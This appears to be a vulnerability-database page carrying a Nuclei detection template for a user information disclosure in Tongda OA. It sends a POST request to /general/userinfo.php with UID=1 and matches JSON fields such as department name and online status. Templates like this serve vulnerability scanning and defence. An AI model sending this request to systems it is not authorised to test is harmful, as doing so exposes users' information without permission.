tongda-session-disclosure: Tongda User Session Disclosure

2025-08-01 Tongda PoC Public

Description

Tongda User session exposed.

PoC

id: tongda-session-disclosure

info:
  name: Tongda User Session Disclosure
  author: ritikchaddha
  severity: medium
  description: Tongda User session exposed.
  reference:
    - https://mp.weixin.qq.com/s/llyGEBRo0t-C7xOLMDYfFQ
  metadata:
    max-request: 1
  tags: tongda,disclosure,vuln

http:
  - method: POST
    path:
      - "{{BaseURL}}/general/userinfo.php?UID=1"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"dept_name":"'
          - '"online_flag":'
        condition: and

      - type: word
        part: header
        words:
          - "application/json"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402206f3b293b3e19f939abfb3f7caffe5fbb3b844378ea984dd415ba173c70e10c1c0220622f916a63d89b98162692fa4c83faf991139a4a25caa6f3976693a695f16c03:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities